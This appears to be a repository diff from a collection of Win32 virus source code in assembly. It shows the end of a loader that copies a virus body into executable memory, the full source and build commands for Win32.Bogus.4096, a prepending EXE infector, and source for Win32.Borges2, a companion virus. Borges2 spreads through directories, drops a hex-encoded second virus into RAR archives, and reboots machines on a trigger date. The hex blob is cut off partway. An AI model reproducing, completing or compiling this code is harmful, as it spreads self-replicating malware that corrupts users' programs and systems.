add ebx,[esp]
add ebx,edx
mov dx,word ptr [ebx]
shl edx,2h
mov ebx,[eax + 1ch]
add ebx,[esp]
add ebx,edx
mov ebx,[ebx]
add ebx,[esp] ;ebx - GlobalAlloc address
pop eax
push PAGE_EXECUTE_READWRITE
push 1000h
push VirusSize
push 0h
call ebx ;allocate memory
push eax
xchg edi,eax
mov esi,12345678h
VirusEntryPoint equ ($-4)
mov ecx,VirusSize
rep movsb
ret
SizeOfLoaderCode equ ($-Loader_Code)
_GetProcAddress db "GetProcAddress",0
__GetProcAddress dd 0
ApiNamesTable:
_CreateFile db "CreateFileA",0
_CloseHandle db "CloseHandle",0
_CreateFileMapping db "CreateFileMappingA",0
_MapViewOfFile db "MapViewOfFile",0
_UnmapViewOfFile db "UnmapViewOfFile",0
_FindFirstFileA db "FindFirstFileA",0
_FindNextFileA db "FindNextFileA",0
_VirtualProtect db "VirtualProtect",0
ApiAddressTable:
CreateFile dd 0
CloseHandle dd 0
CreateFileMapping dd 0
MapViewOfFile dd 0
UnmapViewOfFile dd 0
FindFirstFile dd 0
FindNextFile dd 0
VirtualProtect dd 0
NumberOfApis equ 8
VirusEnd equ $
Exit:
push eax
call ExitProcess
end _main
Win32/Infector/Win32.Bogus.4096.asm
+193
View File
@@ -0,0 +1,193 @@
comment *
Win32.Bogus.4096 ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ ÜÛÛÛÛÛÜ
Disassembly by ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ ÛÛÛ
Darkman/29A ÜÜÜÛÛß ßÛÛÛÛÛÛ ÛÛÛÛÛÛÛ
ÛÛÛÜÜÜÜ ÜÜÜÜÛÛÛ ÛÛÛ ÛÛÛ
ÛÛÛÛÛÛÛ ÛÛÛÛÛÛß ÛÛÛ ÛÛÛ
Win32.Bogus.4096 is a 4096 bytes runtime/direct action EXE virus. Infects
first file in current directory, when executed, by prepending the virus to
the original EXE file.
Compile Win32.Bogus.4096 with Turbo Assembler v 5.0 by typing:
TASM32 /M /ML /Q BOGUS.ASM
TLINK32 -Tpe -c -x -aa -r BOGUS.OBJ,,, IMPORT32
*
.386
.model flat
; KERNEL32.dll
extrn ExitProcess:proc
extrn FindFirstFileA:proc
extrn WinExec:proc
extrn _lclose:proc
extrn _llseek:proc
extrn _lopen:proc
extrn _lread:proc
extrn _lwrite:proc
extrn CopyFileA:proc
.data
MAX_PATH equ 0ffh
FALSE equ 00h
OF_READWRITE equ 02h ; Opens the file for reading and
; writing
SW_SHOW equ 05h ; Activates the window and displays it
; in its current size and position
FILETIME struct
dwLowDateTime DWORD ? ; Specifies the low-order 32 bits of
; the file time
dwHighDateTime DWORD ? ; Specifies the high-order 32 bits of
; the file time
FILETIME ends
WIN32_FIND_DATA struct
dwFileAttributes DWORD ? ; Specifies the file attributes of the
; file found
ftCreationTime FILETIME <> ; Specifies the time the file was
; created
ftLastAccessTime FILETIME <> ; Specifies the time that the file was
; last accessed
ftLastWriteTime FILETIME <> ; Specifies the time that the file was
; last written to
nFileSizeHigh DWORD ? ; Specifies the high-order DWORD value
; of the file size, in bytes
nFileSizeLow DWORD ? ; Specifies the low-order DWORD value
; of the file size, in bytes
dwReserved0 DWORD ? ; Reserved for future use
dwReserved1 DWORD ? ; Reserved for future use
cFileName BYTE MAX_PATH dup(?)
; A null-terminated string that is the
; name of the file
cAlternate BYTE 0eh dup(?) ; A null-terminated string that is an
; alternative name for the file
ends
FindFileData WIN32_FIND_DATA <>
szFileName db '*.exe',00h ; Name of file to search for
szNewFileName db 'ZerNeboGus.exe',00h
; Null-terminated string that
; specifies the name of the new file
cBuffer db ? ; Buffer for read data, data to be
; written
cBuffer_ db ? ; Buffer for read data, data to be
; written
.code
code_begin:
lea edi,[esp+10h] ; EDI = pointer to buffer for module
; path
push edi ; EDI = pointer to buffer for module
; path
repne scasb ; Find end of filename
mov byte ptr [edi-01h],'.' ; Store dot
pop edi ; EDI = pointer to buffer for module
; path
push offset FindFileData ; Address of returned information
push offset szFileName ; Address of name of file to search
; for
call FindFirstFileA
push FALSE ; If file already exists, overwrite it
push offset szNewFileName ; Address of filename to copy to
push edi ; Address of name of an existing file
call CopyFileA
push OF_READWRITE ; Opens the file for reading and
; writing
push offset FindFileData.cFileName
; Address of name of file to open
call _lopen
mov esi,eax ; ESI = file handle
push OF_READWRITE ; Opens the file for reading and
; writing
push offset szNewFileName ; Address of filename to copy to
call _lopen
mov edi,eax ; EDI = file handle
xor ebx,ebx ; Number of bytes read and written
mov ebp,0fffff000h ; Number of bytes to move through
; source file
read_write_loop:
push 00h ; Position to move from
push ebx ; Number of bytes to move
push esi ; Pointer to destination filename
call _llseek
push 01h ; Length, in bytes, of data buffer
push offset cBuffer ; Address of buffer for read data
push esi ; Pointer to destination filename
call _lread
push 00h ; Position to move from
push ebx ; Number of bytes to move
push edi ; Pointer to source filename
call _llseek
push 01h ; Length, in bytes, of data buffer
push offset cBuffer_ ; Address of buffer for read data
push edi ; Pointer to source filename
call _lread
push 00h ; Position to move from
push ebx ; Number of bytes to move
push esi ; Pointer to destination filename
call _llseek
push 01h ; Number of bytes to write
push offset cBuffer_ ; Address of buffer for data to be
; written
push esi ; Pointer to destination filename
call _lwrite
push 02h ; Position to move from
push 00h ; Number of bytes to move
push esi ; Pointer to destination filename
call _llseek
push 01h ; Number of bytes to write
push offset cBuffer ; Address of buffer for data to be
; written
push esi ; Pointer to destination filename
call _lwrite
push 02h ; Position to move from
push ebp ; Number of bytes to move
push edi ; Pointer to source filename
call _llseek
push 01h ; Length, in bytes, of data buffer
push offset cBuffer ; Address of buffer for read data
push edi ; Pointer to source filename
call _lread
push 00h ; Position to move from
push ebx ; Number of bytes to move
push edi ; Pointer to source filename
call _llseek
push 01h ; Number of bytes to write
push offset cBuffer ; Address of buffer for data to be
push edi ; Pointer to source filename
call _lwrite
inc ebx ; Increase number of bytes read and
; written
inc ebp ; Increase number of bytes to move
; through source file
cmp bx,1000h ; Read and written all of the virus?
jne read_write_loop ; Not equal? Jump to read_write_loop
push edi ; Handle of file to close
call _lclose
push SW_SHOW ; Activates the window and displays it
; in its current size and position
push offset szNewFileName ; Address of filename to copy to
call WinExec
code_end:
end code_begin
Win32/Infector/Win32.Borges2.asm
+704
View File
@@ -0,0 +1,704 @@
; ;
; ------------> WIN32.BORGES Virus ver 2.0 by Int13h/IKX <-------------;
; EXE Companion with directory navigation. It drops a virus over RAR;
; archives. On setember 19 reboots the machine and on tuesdays puts a;
; text in the clipboard. ­Jorge Luis Borges se merec¡a el Premio Nobel!;
; PUTRIDO SUECO COMITE NOBEL ;
; - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - cd13- -;
; ;
; COMPILATION: ;
; tasm32 /ml /m3 borges.asm,,; ;
; tlink32 /Tpe /aa /c /v borges.obj,,, import32.lib, ;
;
.386
.model flat
locals
extrn FindFirstFileA:PROC
extrn FindNextFileA:PROC
extrn SetCurrentDirectoryA:PROC
extrn GetCurrentDirectoryA:PROC
extrn GetSystemTime:PROC
extrn MoveFileA:PROC
extrn CopyFileA:PROC
extrn CreateFileA:PROC
extrn WriteFile:PROC
extrn SetFilePointer:PROC
extrn CloseHandle:PROC
extrn GlobalAlloc:PROC
extrn GlobalLock:PROC
extrn GlobalUnlock:PROC
extrn OpenClipboard:PROC
extrn SetClipboardData:PROC
extrn EmptyClipboard:PROC
extrn CloseClipboard:PROC
extrn GetTickCount:PROC
extrn GetCommandLineA:PROC
extrn CreateProcessA:PROC
extrn lstrcpyA:PROC
extrn MessageBoxA:PROC
extrn ExitWindowsEx:PROC
extrn ExitProcess:PROC
HeaderSize equ FinRARHeader-RARHeader
Size equ 4774
.DATA
TituloVentana db 'WIN32.BORGES VIRUS 2.0 by Int13h/IKX',0
TextoVentana db 'Made in Paraguay, South America',0
Posicion dd 0
MemHandle dd 0
FileHandle dd 0
Chequeo dd 0
Number dd 0
Victimas db '*.EXE',0
Victimas2 db '*.RAR',0
RARHeader:
RARHeaderCRC dw 0
RARType db 074h
RARFlags dw 8000h
RARHeadsize dw HeaderSize
RARCompressed dd Size
RAROriginal dd Size
RAROs db 0
RARCrc32 dd 0
RARFileTime db 063h,078h
RARFileDate db 031h,024h
RARNeedVer db 014h
RARMethod db 030h
RARFnameSize dw FinRARHeader-RARName
RARAttrib dd 0
RARName db "KUARAHY.EXE"
FinRARHeader label byte
SearcHandle1 dd 0
SearcHandle2 dd 0
Longitud dd 0
ProcessInfo dd 4 dup (0)
StartupInfo dd 4 dup (0)
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0
Hallado db 200 dup (0)
Crear db 200 dup (0)
ParaCorrer db 200 dup (0)
Original db 200 dup (0)
Actual db 200 dup (0)
PuntoPunto db '..',0
SystemTimeStruc dw 0,0,0,0,0,0,0,0
Kuarahy2: ; Virus to drop: Kuarahy 1.1 com/exe/sys/obj/ovl/bat/arj/rar/bs/mbr
db 0ebh,03ch,090h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h,000h
db 000h,000h,0bfh,04dh,001h,0b9h,0d8h,000h,02eh,081h,035h,0feh,0d2h,047h,047h
db 0e2h,0f7h,07fh,0ech,0feh,0d2h,033h,0f2h,08bh,0d1h,017h,07ah,0ffh,0f9h,03eh
db 028h,070h,002h,042h,0d2h,082h,029h,002h,0c4h,0e1h,01fh,0ech,0ffh,0f2h,0d2h
db 05dh,0c1h,0fah,063h,0f8h,001h,01eh,05ch,03eh,06ch,0feh,0aeh,0cdh,02dh,047h
db 0d2h,0ffh,021h,05bh,06ah,0f7h,0d0h,045h,0d2h,0fch,0f4h,07eh,0ech,057h,0d2h
db 0b8h,0a6h,0f6h,06bh,0fdh,0d2h,044h,052h,0feh,039h,0fbh,06bh,0fch,082h,0d5h
db 000h,033h,0c1h,046h,0dbh,0fch,01fh,0edh,0a1h,0fdh,03bh,05bh,0d2h,0f8h,069h
db 052h,0d2h,0adh,019h,0b6h,081h,0feh,06ah,0deh,0d2h,016h,09ch,0ffh,0fch,038h
db 0d4h,055h,0d2h,0feh,0f4h,038h,0d4h,054h,0d2h,0adh,0f4h,038h,0d4h,04bh,0d9h
db 0b0h,073h,0b2h,0d2h,0d8h,071h,062h,0d3h,039h,0d4h,0b2h,0d2h,08fh,0d3h,05fh
db 09ch,0feh,0f4h,05dh,04ch,0ffh,05eh,0f8h,09ch,0feh,06ah,0ffh,0d0h,045h,064h
db 0ech,06bh,0ffh,0d2h,044h,052h,0feh,04eh,0d0h,02dh,0e0h,04eh,0ffh,0a0h,0a6h
db 0f4h,07fh,06dh,0b5h,0d2h,01ch,025h,08ah,09dh,0d8h,014h,0f8h,07bh,0feh,09ah
db 0e0h,0d4h,0e1h,0e1h,001h,06ah,0ffh,0d1h,045h,064h,0ech,06bh,0fch,0d2h,044h
db 052h,0feh,01fh,0edh,0fch,038h,0d4h,0ech,0deh,09ch,085h,0e0h,0d4h,043h,0ddh
db 0fch,03ah,049h,0d9h,0f9h,0cdh,0a1h,06ch,089h,0c2h,045h,0b1h,0ebh,03ah,0e2h
db 0ddh,046h,0dbh,0fdh,069h,09dh,0c5h,047h,0d1h,0feh,068h,07eh,0d2h,033h,0c1h
db 07dh,02dh,0deh,0a7h,0ffh,011h,0e1h,0f4h,038h,0d4h,057h,0d2h,0b8h,0f4h,07eh
db 0ech,057h,0d2h,0b8h,0a6h,0f6h,068h,07eh,0d2h,047h,0d0h,0feh,039h,0fbh,0e1h
db 02ch,06bh,0ffh,082h,0e0h,0d5h,045h,0d2h,082h,06ah,0ffh,0d0h,033h,0c1h,046h
db 0d3h,0fch,01fh,0edh,038h,0feh,0aeh,0feh,0d2h,016h,08dh,0f3h,0efh,0edh,01fh
db 08bh,0d1h,017h,0cbh,0f3h,052h,002h,0d1h,08bh,0d1h,017h,0d3h,0f5h,052h,002h
db 0d0h,08bh,0c0h,07dh,02bh,0ffh,0a7h,0f3h,057h,02ch,0a7h,0fdh,03bh,0a4h,0dfh
db 07fh,028h,07eh,0d2h,08ah,0d7h,014h,0d2h,0feh,0d2h,0feh,083h,04fh,0d0h,033h
db 0c1h,0a7h,018h,0fch,0d2h,0aeh,083h,0ach,06ah,0ffh,0d0h,0cdh,000h,047h,0d3h
db 0aeh,04eh,0d0h,02dh,0e0h,04eh,0ffh,06ah,0ffh,0d0h,062h,0fch,001h,0cch,062h
db 0d3h,0a4h,08bh,0a6h,018h,0fch,0d2h,0deh,0ech,0b5h,087h,0bfh,080h,0bfh,09ah
db 0a7h,0eeh,0deh,0f2h,0b5h,0bdh,09fh,0f2h,096h,0b3h,0d9h,0b7h,0deh,09bh,090h
db 0a6h,0cfh,0e1h,096h,0fdh,0b7h,099h,0a6h,0f2h,08ch,0b7h,093h,0b0h,097h,0b3h
db 08eh,0bdh,095h,0a7h,07ch,0f2h,096h,0bbh,090h,0b3h,0dfh,0f2h,0c4h,0fbh,020h
db 055h,0aah,0beh,00fh,003h,0b9h,04bh,008h,02eh,081h,034h,038h,03ch,046h,046h
db 0e2h,0f7h,005h,01ch,038h,049h,039h,0ffh,0d0h,03ch,038h,061h,0b9h,0d1h,020h
db 03eh,016h,0bch,086h,02eh,034h,06fh,04dh,03fh,0d1h,03dh,03eh,084h,02bh,0f1h
db 0f5h,01dh,005h,0f1h,02bh,049h,03bh,0d5h,0e9h,03ch,03eh,084h,019h,009h,0f5h
db 01dh,016h,0b5h,0a6h,0e7h,03ch,012h,0b4h,0bah,0e5h,038h,016h,0b5h,0a6h,02fh
db 034h,012h,0b4h,0bah,02dh,030h,026h,0f9h,026h,03ah,038h,0bch,007h,0d6h,04dh
db 022h,0fdh,063h,039h,0bdh,007h,0ach,0a8h,049h,0cah,0bfh,0d3h,00eh,0b9h,003h
db 0a8h,0ach,04dh,030h,016h,0b5h,0a6h,02fh,034h,012h,0b4h,0a2h,02dh,030h,0d3h
db 033h,0b9h,003h,026h,012h,04dh,035h,0bbh,0ffh,01dh,0bdh,007h,0c6h,0b8h,048h
db 0ddh,023h,080h,02fh,0f5h,0f1h,02bh,001h,0f5h,02fh,04dh,015h,06bh,03bh,036h
db 023h,0b5h,08ah,0e3h,038h,087h,0e7h,03ch,099h,09dh,0b1h,08eh,02fh,034h,083h
db 02bh,030h,09dh,099h,00bh,0fch,0b6h,0fch,0c2h,083h,0bch,03ch,080h,0adh,03ch
db 097h,0b3h,0ffh,093h,0c7h,03fh,0d7h,074h,0b0h,0e0h,074h,0b6h,0fch,01eh,09dh
db 03bh,03ch,015h,0f9h,03ah,0afh,026h,03bh,08ch,076h,0f5h,01dh,08ch,074h,083h
db 0f8h,03ah,0f1h,019h,074h,0b6h,0fch,01eh,0fbh,03eh,03dh,038h,034h,038h,01ah
db 0ffh,03ah,030h,03ch,041h,077h,078h,0b2h,0f8h,00fh,0c7h,032h,027h,0b1h,08eh
db 03ch,038h,085h,003h,010h,0cbh,098h,01eh,0fah,03eh,089h,033h,072h,03eh,023h
db 080h,01dh,01dh,086h,0a9h,038h,0f5h,01dh,03fh,084h,0c6h,0f6h,0f5h,01dh,0b8h
db 082h,02ah,030h,07bh,048h,052h,0bch,086h,02eh,034h,07eh,04dh,03fh,0d1h,041h
db 038h,0bch,086h,02eh,034h,073h,04dh,03fh,0d1h,037h,039h,00fh,0c7h,0bch,086h
db 02eh,034h,07dh,04dh,03fh,0d1h,011h,039h,0bch,086h,02eh,034h,06eh,04dh,03fh
db 0d1h,01fh,039h,088h,012h,0f1h,019h,0bch,0c2h,031h,04dh,031h,087h,01ch,038h
db 03ah,06dh,0d4h,02ah,03dh,065h,03bh,0a9h,0f1h,02eh,03ah,027h,0b7h,0e5h,0b0h
db 0f8h,039h,028h,03ch,016h,03dh,0bfh,04ah,03bh,0c6h,016h,03fh,0bfh,046h,03bh
db 0b2h,0e8h,012h,0b3h,09bh,040h,03fh,0c3h,0d4h,021h,03ch,0d3h,03ch,0d2h,02ch
db 038h,03ch,038h,02ch,038h,059h,03fh,0d4h,0dbh,034h,0b5h,08ah,0cfh,037h,087h
db 03ch,039h,06bh,0c4h,098h,09dh,00fh,0f8h,017h,0e3h,00fh,0f1h,017h,0eah,00fh
db 0ceh,017h,0c7h,00fh,0d5h,0ffh,0d0h,0fah,030h,09dh,014h,03ch,0b4h,0b2h,089h
db 02ch,0b4h,0b2h,08dh,02ch,0b1h,0bah,091h,02ch,0b4h,0b2h,095h,02ch,0b6h,03ah
db 014h,03ch,013h,0fch,087h,03dh,038h,073h,097h,049h,0c4h,07bh,07fh,03ah,027h
db 032h,03fh,0b7h,0cfh,0b1h,086h,070h,02ah,085h,0b8h,03ch,0cbh,098h,036h,032h
db 027h,03bh,012h,0fch,0b5h,082h,074h,02eh,081h,041h,038h,0ceh,096h,0fbh,07dh
db 0c0h,07ah,07dh,0feh,079h,0c6h,068h,086h,0bch,038h,073h,0b2h,032h,0b8h,03ch
db 00ah,0d1h,0c6h,0fdh,086h,0bdh,038h,0cfh,09ch,0b1h,08eh,074h,02ah,083h,0b8h
db 03ch,094h,000h,035h,048h,03bh,096h,0d3h,0c4h,092h,0bdh,0d7h,0bdh,038h,0b7h
db 0f7h,0b4h,036h,0bch,038h,0c6h,084h,04ch,02fh,0c7h,08ch,076h,083h,018h,03ah
db 0f1h,019h,0b1h,0aeh,08bh,028h,084h,038h,077h,0b5h,0a2h,091h,02ch,0f5h,01dh
db 08ch,071h,0f5h,01dh,08ch,070h,0f5h,01dh,0d0h,012h,030h,0b1h,08eh,068h,03ch
db 083h,038h,0c6h,0b3h,0fbh,081h,039h,038h,0cfh,09dh,098h,0b5h,08ah,09eh,02eh
db 087h,03ch,039h,06bh,081h,05ch,0d2h,00fh,0e3h,00fh,0eah,0c3h,0d8h,0cfh,09ch
db 00fh,0ceh,017h,0c7h,00fh,0f8h,017h,0f1h,0ffh,0d0h,03ch,030h,088h,031h,0b1h
db 0aeh,068h,033h,0f1h,019h,085h,022h,03ch,0b5h,08ah,0eeh,02ch,0b3h,0d2h,082h
db 07dh,038h,06dh,080h,03ch,029h,087h,038h,032h,081h,03dh,038h,0f1h,028h,07eh
db 0bbh,0f9h,036h,065h,0dah,0d1h,0bbh,0c3h,018h,049h,039h,0ffh,0f5h,01ch,0d0h
db 003h,032h,001h,02bh,0f1h,04dh,03fh,0d1h,0c5h,031h,001h,0c6h,0f6h,04dh,03fh
db 0d1h,060h,033h,0bch,0c4h,077h,04dh,03fh,0d1h,0b0h,038h,0bch,0c4h,06ah,04dh
db 03fh,0d1h,0b8h,038h,0bch,0c4h,07fh,04ch,043h,0a8h,0ach,0a8h,0bch,0c4h,001h
db 04ch,04bh,005h,03ch,054h,048h,04ah,001h,019h,009h,04ch,028h,005h,01dh,01dh
db 048h,022h,001h,038h,06bh,04ch,07bh,005h,03dh,06fh,048h,023h,0d6h,035h,07dh
db 022h,03ch,016h,0b7h,026h,0e7h,03ch,012h,0b6h,03ah,0e5h,038h,0f7h,012h,0b1h
db 02ah,0e3h,038h,016h,0b0h,026h,0e1h,03ch,0f3h,06ah,06dh,080h,03ch,06fh,0a0h
db 016h,0c3h,026h,02fh,034h,0bch,0d9h,023h,0b8h,0c5h,026h,049h,030h,065h,0b8h
db 0ddh,0d8h,0bch,0f1h,022h,069h,065h,062h,084h,039h,06bh,0a4h,012h,0c7h,022h
db 02bh,030h,0f7h,0a0h,016h,0c3h,026h,02fh,034h,06dh,0b8h,0ddh,027h,0bch,0c1h
db 022h,04dh,034h,061h,0bch,0d9h,0dch,0b8h,0f5h,039h,06dh,061h,0f3h,088h,03fh
db 0f7h,0a0h,068h,06fh,069h,06eh,06eh,06bh,06dh,022h,03eh,001h,038h,050h,04dh
db 036h,0bbh,0c6h,039h,048h,03bh,0d5h,0a8h,03eh,0b3h,0eah,06ah,022h,080h,018h
db 00dh,0f1h,019h,012h,0b1h,022h,092h,02eh,016h,0b0h,03eh,090h,02ah,032h,027h
db 084h,01ch,019h,082h,009h,03dh,0f1h,019h,023h,062h,012h,0b1h,02ah,096h,02eh
db 016h,0b0h,026h,08ch,02ah,0b0h,0e3h,022h,03fh,0c0h,0b3h,0c6h,081h,0bch,038h
db 08ch,016h,0ceh,096h,048h,03bh,0d5h,070h,03eh,01eh,0b7h,07dh,0c1h,035h,01ch
db 018h,001h,056h,058h,04dh,03fh,0d1h,005h,03ah,001h,059h,052h,04dh,03fh,0d1h
db 00dh,03ah,001h,059h,04ah,04dh,03fh,0d1h,015h,03ah,001h,057h,048h,04dh,03fh
db 0d1h,01dh,03ah,001h,04ah,058h,04dh,03fh,0d1h,025h,03ah,001h,04ah,049h,04dh
db 03fh,0d1h,02dh,03ah,001h,051h,048h,04dh,03fh,0d1h,035h,03ah,001h,04eh,04ch
db 04dh,03fh,0d1h,03dh,03ah,001h,051h,052h,04dh,03fh,0d1h,0c5h,039h,001h,054h
db 04ch,04dh,03fh,0d1h,0cdh,039h,032h,03fh,082h,08eh,028h,0bfh,0cbh,09dh,098h
db 0d0h,048h,03eh,0d4h,0dah,03bh,04bh,03fh,0d1h,0e1h,039h,084h,038h,001h,0a4h
db 012h,0c7h,022h,02bh,030h,04bh,03fh,0d1h,0f3h,039h,0afh,036h,023h,0feh,03ah
db 091h,03ch,070h,03ah,06bh,084h,018h,02eh,0f5h,013h,080h,02ah,02ah,00eh,0c7h
db 01ah,0b2h,021h,0f5h,013h,01eh,0b6h,075h,038h,0b0h,032h,090h,02eh,01eh,0fah
db 07dh,038h,018h,01ah,0feh,079h,03ah,03eh,0b1h,002h,08ah,02eh,0b4h,03ah,08ch
db 02eh,063h,03bh,080h,03dh,07bh,086h,045h,02ch,013h,0f5h,0a4h,012h,0c7h,022h
db 02bh,030h,08ch,07dh,082h,041h,028h,0f1h,019h,088h,079h,086h,0b2h,02ch,0f5h
db 01dh,08ch,07dh,082h,0a9h,028h,0f1h,019h,088h,079h,086h,099h,02ch,0f5h,01dh
db 080h,03ch,06fh,0a0h,0c7h,022h,02bh,030h,0b1h,032h,018h,030h,0b1h,02ah,011h
db 030h,0b1h,02ah,0bah,02eh,0b8h,0ddh,027h,0bch,0c1h,022h,04dh,03fh,0d1h,06dh
db 039h,088h,007h,085h,015h,03ch,082h,08ah,02ch,0f1h,019h,0b7h,0cah,0b7h,03ch
db 0d5h,050h,038h,06bh,088h,008h,0f1h,019h,067h,004h,03bh,04ah,03fh,0d1h,013h
db 039h,0d4h,08eh,039h,0bdh,0eeh,04ch,03fh,0d1h,019h,039h,001h,0a8h,0deh,04eh
db 03fh,0d1h,021h,039h,001h,0a2h,03eh,04fh,03fh,0d1h,029h,039h,0bdh,044h,037h
db 06fh,068h,04dh,03fh,0d1h,037h,039h,083h,0cfh,037h,09dh,098h,015h,03fh,038h
db 09fh,08fh,037h,0b3h,0d4h,0b9h,0f9h,02ah,03fh,0d0h,03ch,03eh,085h,09eh,02eh
db 082h,05fh,02dh,088h,078h,0f1h,019h,0d4h,057h,039h,08ch,07ch,081h,03fh,038h
db 086h,08eh,037h,0f5h,01dh,0d1h,0ebh,038h,0bch,006h,02eh,034h,06fh,04dh,03fh
db 0d1h,0efh,038h,0bfh,044h,024h,078h,04eh,03bh,0d5h,0f2h,03ch,0bbh,040h,022h
db 03ch,04ch,03fh,0d1h,0fdh,038h,0bdh,044h,017h,06fh,068h,04dh,03fh,0d1h,08bh
db 038h,0d4h,006h,039h,081h,03ch,03ah,0cbh,0c9h,037h,0eah,048h,039h,07ch,001h
db 068h,03ah,048h,03bh,0d5h,09ah,03ch,001h,078h,03ch,048h,03bh,0d5h,0a2h,03ch
db 0d0h,01dh,03dh,06fh,06ah,06ch,0fch,03ah,0f2h,028h,09bh,048h,03bh,0b0h,03eh
db 04ah,03bh,0f8h,03eh,0f8h,02ch,0b0h,03eh,044h,03bh,09fh,042h,03fh,099h,082h
db 02ch,08dh,03ch,0efh,0d8h,0afh,060h,066h,068h,06eh,013h,0ffh,0bbh,0e6h,038h
db 085h,028h,03ch,0cfh,0cdh,0b1h,02ah,0f2h,028h,0b3h,0d6h,09bh,0f0h,02ch,09fh
db 0fch,028h,0ffh,03ah,0feh,028h,038h,03ch,062h,064h,03dh,09ah,02ah,0bfh,0eah
db 03ch,089h,035h,068h,0efh,0d0h,0efh,0f2h,037h,0eah,0c5h,02bh,0ech,060h,0bch
db 0dch,03dh,0b1h,02ah,082h,028h,09bh,084h,02ch,09dh,0f8h,028h,0c0h,039h,013h
db 03dh,04ah,03fh,09bh,0fch,02ch,0fbh,03eh,0feh,02ch,0c3h,0c7h,067h,0b9h,0f9h
db 037h,03eh,0d0h,01ah,03dh,085h,09eh,02eh,08ch,07ch,082h,05fh,02dh,0f1h,019h
db 0d4h,0adh,038h,08ch,07ch,081h,026h,038h,086h,08eh,028h,0f5h,01dh,0d0h,077h
db 03ch,0d4h,025h,03fh,08ch,002h,0f5h,01dh,036h,023h,080h,018h,01dh,012h,0fdh
db 02ah,092h,02eh,0f5h,01dh,03fh,023h,065h,063h,066h,066h,061h,067h,060h,0a1h
db 016h,0c3h,016h,0e7h,03ch,0bch,006h,02eh,034h,06fh,04dh,0e6h,0b3h,078h,03eh
db 09fh,012h,034h,0d0h,067h,03ch,09fh,084h,028h,0b9h,03ah,084h,028h,038h,03eh
db 0b3h,0d4h,0b9h,0f9h,037h,03eh,0d0h,0f4h,03ch,085h,09eh,02eh,08ch,07ch,082h
db 05fh,02dh,0f1h,019h,0d4h,00fh,038h,08ch,07ch,081h,036h,038h,086h,08eh,028h
db 0f5h,01dh,0d3h,09ch,080h,070h,038h,06ch,06bh,06dh,06ah,06ah,03eh,022h,036h
db 032h,027h,03bh,080h,02fh,0f5h,0f1h,02bh,001h,0f5h,02fh,04ch,075h,080h,03dh
db 03ah,0b1h,0a6h,09ah,02ah,085h,039h,03ch,082h,0bch,038h,0f1h,02bh,01ah,0b9h
db 083h,073h,03ch,0dah,0cbh,04ch,00dh,080h,03dh,03bh,085h,03ah,03ch,0f5h,02fh
db 01eh,0fbh,0beh,035h,03ah,03ch,038h,0b7h,0cdh,06ah,0b9h,0fah,007h,03ch,0ffh
db 038h,075h,040h,063h,0b1h,08eh,04bh,028h,0d4h,0f6h,03bh,080h,035h,03bh,0b1h
db 0a6h,03ch,03ah,085h,03bh,03ch,082h,0bch,038h,0f1h,02bh,088h,03ch,0f1h,022h
db 0bch,0c2h,02fh,04dh,020h,0d0h,03ch,038h,067h,0b9h,0d7h,0aeh,034h,0b5h,08bh
db 06ch,037h,081h,076h,038h,090h,013h,0e7h,08ch,032h,0f5h,02ch,0dah,0cbh,00bh
db 0fch,0f5h,02ah,027h,03bh,066h,066h,061h,067h,013h,0fch,0fbh,0bch,006h,02eh
db 034h,073h,04ch,03fh,0d1h,031h,0c7h,0d4h,0b7h,03fh,00bh,0c3h,0d0h,0bfh,03dh
db 000h,098h,048h,023h,000h,09ah,048h,02fh,000h,0b2h,048h,058h,000h,0b4h,049h
db 03bh,0d5h,0cah,0c2h,080h,03dh,07ah,00fh,0f1h,0f1h,019h,04fh,0d9h,0d5h,0deh
db 0c2h,06ah,084h,039h,07eh,013h,0f5h,0a1h,0f1h,019h,06eh,068h,088h,007h,085h
db 03bh,03ch,082h,079h,02ah,0f1h,019h,037h,0c7h,049h,029h,07bh,0b9h,002h,07eh
db 02eh,038h,03dh,04ch,034h,0c2h,0bfh,0fch,03ah,0c3h,0d5h,084h,0c2h,0b9h,03ah
db 07eh,02eh,09eh,02eh,062h,065h,069h,06eh,080h,03ch,07ah,0f1h,019h,088h,078h
db 086h,07dh,02eh,081h,03fh,038h,0f1h,019h,066h,061h,084h,038h,07eh,0f5h,01dh
db 062h,0d7h,09fh,085h,0c7h,0c3h,082h,0c1h,0c7h,084h,039h,07eh,0f5h,01dh,081h
db 03ah,038h,086h,0e8h,02ch,08ch,07ch,0f5h,01dh,085h,033h,03bh,0d4h,0bfh,03fh
db 08ch,07ch,081h,09ah,02ah,086h,05bh,029h,0f5h,01dh,08ch,07ch,081h,036h,038h
db 086h,0feh,02ch,0f5h,01dh,0d1h,05dh,0c6h,0d4h,094h,03eh,03eh,0d4h,045h,03dh
db 03fh,088h,006h,0f1h,019h,012h,0fdh,00ah,096h,02eh,087h,0dfh,02ch,0b7h,0efh
db 085h,0b8h,03ch,094h,000h,016h,048h,03bh,096h,0dah,0c4h,092h,032h,027h,0fbh
db 03dh,07fh,077h,0fbh,07dh,03eh,075h,03ch,08ch,000h,081h,01ch,038h,0f1h,019h
db 04fh,03bh,0d5h,00ah,0c2h,0abh,06eh,085h,033h,03bh,0d4h,017h,03fh,081h,09ah
db 02ah,088h,078h,086h,05bh,029h,0f5h,01dh,08ch,002h,0f5h,01dh,062h,06eh,080h
db 03eh,005h,0a0h,016h,0c3h,026h,02fh,034h,0afh,0d0h,06dh,03ah,088h,006h,0f1h
db 019h,066h,080h,03dh,07bh,085h,01bh,03ch,0a4h,012h,0c7h,022h,02bh,030h,0d1h
db 0c5h,0c5h,072h,071h,074h,071h,070h,018h,07dh,06bh,06fh,07dh,071h,07ah,070h
db 07dh,06eh,018h,071h,079h,075h,06dh,06fh,019h,001h,06bh,05dh,04ch,03fh,0d1h
db 0ebh,0c5h,0d4h,05fh,03eh,087h,050h,02ah,085h,03ch,03ch,0d0h,003h,039h,081h
db 037h,03fh,0d0h,0f2h,03ah,084h,03ah,07eh,0a1h,00fh,0f1h,0f1h,019h,082h,05bh
db 029h,081h,09ah,02ah,0d4h,07ch,038h,0b1h,02ah,066h,02eh,09bh,060h,02ah,082h
